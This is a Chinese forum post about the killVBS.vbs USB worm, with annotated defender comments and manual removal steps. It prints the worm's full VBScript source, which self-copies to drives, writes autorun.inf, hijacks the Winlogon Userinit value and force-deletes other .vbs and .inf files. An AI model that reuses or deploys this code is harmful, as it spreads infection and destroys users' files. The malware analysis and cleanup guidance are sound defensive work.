关于killVBS.vbs病毒,瑞星可以查杀么?~
病毒特征1
根目录下生成autorun.inf 文件
代码如下:
killVBS.vbs
shellexecute=wscript.exe killVBS.vbs
病毒特征2
C:\WINDOWS\SYSTEM 下生成killVBS.vbs vbs脚本通过宿主wscript.exe 运行
篡改注册表启动项,添加:
C:\WINDOWS1\system32\userinit.exe,C:\WINDOWS1\system32\wscript.exe C:\WINDOWS1\system32\killVBS.vbs
killVBS.vbs vbs脚本代码具体如下:
'**********************************************************
'******************** Anti autorun vbscript ***************
'******************** Version 1.01 ***************
'**********************************************************
' Analysis notes (added for defenders; the code itself is unchanged).
' The banner calls this an "anti autorun" script, but the body below copies
' itself to the system folder and to removable drives, rewrites autorun.inf,
' changes the Winlogon Userinit value and deletes other .vbs/.inf files.
' Indicators visible in this listing:
'   - a file named killVBS.vbs in the system folder and in removable-drive roots
'   - autorun.inf containing "shellexecute=wscript.exe killVBS.vbs"
'   - Winlogon\Userinit containing "wscript.exe ...\killVBS.vbs" after userinit.exe
Option Explicit
' Every runtime error is suppressed, so failed file/registry operations are silent.
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg
' NOTE(review): the two object-creation calls below appear to have been split
' across lines when the page was extracted; they are reproduced as printed.
Set Fso = Create
Object("Scripting.FileSystem
Object")
Set Shells = Create
Object("Wscript.Shell")
' GetSpecialFolder(0) is the Windows folder, GetSpecialFolder(1) the system folder.
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
' File is the running script itself; Drv is the drive it was started from.
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv=File.Drive
Set InDrive = Fso.drives
' Read the script's own text into AllFile; this buffer is what gets written
' out as each new copy further down.
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
' DriveType of the launch drive (1 = removable, 2 = fixed). Count is set once
' here and never changed, so it decides whether the loop below repeats.
Count=Drv.DriveType
Do
' Drop a copy into the system folder if one is not already there.
If Not Fso.FileExists(SystemDir & "\killVBS.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\killVBS.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\killVBS.vbs")
' -1 sets every attribute bit; presumably meant to mark the copy
' read-only/hidden/system so it is harder to see and remove.
WriteAll.Attributes = -1
End If
' Persistence: Userinit is rewritten on every pass so that wscript.exe runs the
' dropped copy at logon alongside userinit.exe. Because it is rewritten each
' pass, a manual registry fix is undone while the script is still running.
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs"
For Each Drives In InDrive
' Fixed drives: LookVBS is pointed at names ending in "inf" in the drive root.
If Drives.DriveType=2 Then
LookVBS "inf",Drives.Path & "\"
LookVBS "INF",Drives.Path & "\"
End if
' Removable and fixed drives, skipping A:.
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
' Removes a Run value named MS32DLL (presumably another autorun script's
' startup entry), blanks the IE window title and start page, and sets the
' icon used for .vbs files.
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"
' Targets other .vbs files in the Windows folder and the drive root; the match
' is by name only, so legitimate scripts in those folders are also at risk.
LookVBS "vbs",WinDir & "\"
LookVBS "vbs",Drives.Path & "\"
' Removable drives only: write a copy plus an autorun.inf that launches it.
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\killVBS.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\killVBS.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\killVBS.vbs")
WriteAll.Attributes = -1
End If
' Both branches write the same two-line autorun.inf. The first branch handles
' an existing file: -8 leaves the read-only/hidden/system bits clear,
' presumably so the existing file can be overwritten.
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End if
End if
End If
Next
' Started from anything other than a removable drive: wait 10 seconds and
' repeat, so a wscript.exe process stays resident and keeps re-applying the
' changes above. Started from a removable drive, the body runs once.
' For cleanup this means the wscript.exe process has to be ended before the
' files and the Userinit value are restored.
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
' LookVBS: scan the files directly inside SrchPath (no subfolders are visited)
' and request a forced delete of those whose last three name characters equal
' File2Find, ignoring case. A file named exactly "killVBS.vbs" is skipped.
'   File2Find - three-character name suffix to match, e.g. "vbs" or "inf"
'   SrchPath  - folder path ending in "\"; the file name is appended to it directly
' The match is on the name suffix only, not on file content, so any file with a
' matching name in that folder is a deletion target.
sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
' NOTE(review): the object-creation call below appears to have been split
' across lines when the page was extracted; it is reproduced as printed.
Set oFileSys = Create
Object("Scripting.FileSystem
Object")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
' Last three characters of the file name, compared case-insensitively.
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
' Second argument True = force, i.e. read-only files are deleted as well.
If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
病毒表现如下
1篡改IE
2防删除自我复制
3感染U盘
手动利用瑞星卡卡杀毒.
1破坏病毒的autorun.inf:先把autorun.inf改名(如:a.inf),然后马上在同一位置建立名为autorun.inf的文件夹,进行autorun.inf免疫(创建..\文件夹)
2利用瑞星卡卡查出wscript.exe 进程结束进程
3找到C:\WINDOWS\SYSTEM\killVBS.vbs 删除
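4利用瑞星卡卡系统启动项管理,修改
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit 下被病毒改成的键值 C:\WINDOWS1\system32\userinit.exe,C:\WINDOWS1\system32\wscript.exe C:\WINDOWS1\system32\killVBS.vbs
只去掉后面 wscript.exe 那一段,保留 C:\WINDOWS1\system32\userinit.exe,(含末尾逗号);不要把 Userinit 键值整个删除或清空,否则可能无法正常登录系统。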
删除C:\WINDOWS1\system32\killVBS.vbs
5利用瑞星卡卡恢复IE

这样是不是大功告成了`
呵呵`请各位高手多多指教`我目前只能修复到这里
P.S. 用瑞星正版能直接查杀么?~